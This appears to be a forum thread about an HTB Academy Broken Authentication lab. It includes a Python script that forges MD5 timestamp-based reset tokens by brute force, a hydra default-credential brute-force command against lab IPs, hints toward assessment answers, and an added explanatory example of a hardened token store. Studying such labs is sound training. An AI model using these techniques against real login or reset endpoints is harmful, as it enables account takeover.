BROKEN AUTHENTICATION module | HTB Academy

I’m stuck on the “Predictable Reset Token” section!
Who can guide me to practice it, please? Thanks

question 1: Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of ±1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the “Check” button. What is the flag?

Hint: Convert the displayed date to epoch time in milliseconds and use it in the script you will create.

I know the token will be generated by “username and time” then hashed by md5, like the Apache OpenMeeting bug, CVE-2016-0783,
but I convert the datetime to epoch time, and I still get the wrong token!

I’m with you. I would love some help with this

I’m banging my head against the wall with this one. I need serious help. I made an md5 hash of the username + the time in epoch in milliseconds just like the hint says and it doesn’t match the displayed token. Does anyone have a hint?

Does anyone have a hint, please?

I am now at the same point. Was anybody able to progress?

I just skipped it. I tried every combo of htbstudent with every permutation of epoch time, tried switching them, tried putting a colon in between them, switching them. I wrote multiple Python scripts doing random things like taking the date.date() and datetime.datetime(…).timestamp() * 1000. I can’t get it to work.

Use a python script! “now = round (time.time () * 1000)” is the right way and don’t forget the + -1 second for the htbadmin token!

I solved it! The key is to brute-force every possible timestamp within that 2 seconds

I still can’t get it. Here is my script. Where did I go wrong?

```python
#! /usr/bin/python3
import time
import datetime
import requests
from hashlib import md5

headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
           "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
           "Content-Type": "application/x-www-form-urlencoded"}
url = "http://46.101.14.69:30865/question1/"
data = 'submit=htbuser'
res1 = requests.post(url, headers=headers, data=data)
mytime = round(time.time() * 1000)
user = "htbadmin"
for time in range(mytime - 1000, mytime + 1000):
    raw_data = user + str(time)
    encoded = md5(raw_data.encode())
    token = encoded.hexdigest()
    data = "token={token}&submit=check"
    res = requests.post(url, data=data, headers=headers)
    if "Wrong token." in res.text:
        print(f"checking: {time}")
        continue
    else:
        print(res.text)
        break
```

You have misunderstood how the token for “htbadmin” is generated.

When you click on “create reset token for htbuser”, let’s say the timestamp at this moment is T, then the server generates the token for “htbadmin” using a timestamp within the range of [T-1000, T+1000].

Therefore, you are supposed to use the time displayed on the webpage instead of the current timestamp.

PS. There is another issue within your code that could stop you from finding the correct token. I will leave it for you to figure out for now.

Did someone solve the Broken Authentication Skill Assessment?

Thanks! The only problem is that the time displayed on the page is the exact same time as the header (which is why I used it). I’ll look through the rest of my code for the other problem.

> @OceanicSix said:
> You have misunderstood how the token for “htbadmin” is generated.
>
> When you click on “create reset token for htbuser”, let’s say the timestamp at this moment is T, then the server generates the token for “htbadmin” using a timestamp within the range of [T-1000, T+1000].
>
> Therefore, you are supposed to use the time displayed on the webpage instead of the current timestamp.
>
> PS. There is another issue within your code that could stop you from finding the correct token. I will leave it for you to figure out for now.

Question 1 key is not using the time printed, but converting it to your own local time
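An added example, not part of any post in this thread and not HTB's or OpenMeetings' code: the token scheme as the posters describe it (MD5 of username plus epoch milliseconds) beside a CSPRNG-based replacement. The concatenation order, all function and class names, and the sample timestamp are assumptions; it runs offline and shows that a ±1 second window leaves only 2001 possible tokens.

```python
import hashlib
import hmac
import secrets

def weak_reset_token(username: str, epoch_ms: int) -> str:
    # Scheme as described in the thread: MD5 over username + epoch milliseconds.
    # The concatenation order is an assumption of this example.
    return hashlib.md5(f"{username}{epoch_ms}".encode()).hexdigest()

def weak_token_space(username: str, shown_ms: int, window_ms: int = 1000) -> set:
    # Every token the weak scheme can produce within +/- window_ms of a known time.
    return {weak_reset_token(username, t)
            for t in range(shown_ms - window_ms, shown_ms + window_ms + 1)}

def is_guessable(token: str, username: str, shown_ms: int) -> bool:
    # True if the token falls inside the 2001-value space around shown_ms.
    return token in weak_token_space(username, shown_ms)

class ResetTokenStore:
    # Hardened form: 256-bit CSPRNG token, only its SHA-256 kept, expiry, single use.
    def __init__(self, ttl_s: int = 900):
        self.ttl_s = ttl_s
        self._pending = {}  # username -> (sha256 hex of token, expiry in epoch seconds)

    def issue(self, username: str, now_s: float) -> str:
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._pending[username] = (digest, now_s + self.ttl_s)
        return token

    def redeem(self, username: str, token: str, now_s: float) -> bool:
        entry = self._pending.get(username)
        if entry is None:
            return False
        digest, expires = entry
        supplied = hashlib.sha256(token.encode()).hexdigest()
        ok = hmac.compare_digest(digest, supplied) and now_s < expires
        if ok or now_s >= expires:
            del self._pending[username]  # consume on success, purge when expired
        return ok

if __name__ == "__main__":
    T = 1_600_000_000_000  # constructed timestamp, not taken from the lab
    sample = weak_reset_token("htbadmin", T + 437)
    print(len(weak_token_space("htbadmin", T)), is_guessable(sample, "htbadmin", T))
    store = ResetTokenStore()
    strong = store.issue("htbadmin", T / 1000)
    print(is_guessable(strong, "htbadmin", T), store.redeem("htbadmin", strong, T / 1000))
```

The weak token depends only on values an observer knows or can bound, so its strength is the size of the time window; the random token carries no such structure, and the store still needs rate limiting on the redeem endpoint in a real deployment.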

I’m stuck on “Default Credentials”

question
"""
Inspect the login page and perform a bruteforce attack. What is the valid username?
"""

hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 46.101.23.188 -s 31420 http-post-form “/:Username=^USER^&Password=^PASS^:F=<button type=“submit””

I don’t know what the problem is.

Error List or parameter?

Can anyone give me a hint?

Thanks

“CTRL + U” to view page source, and googling the title information!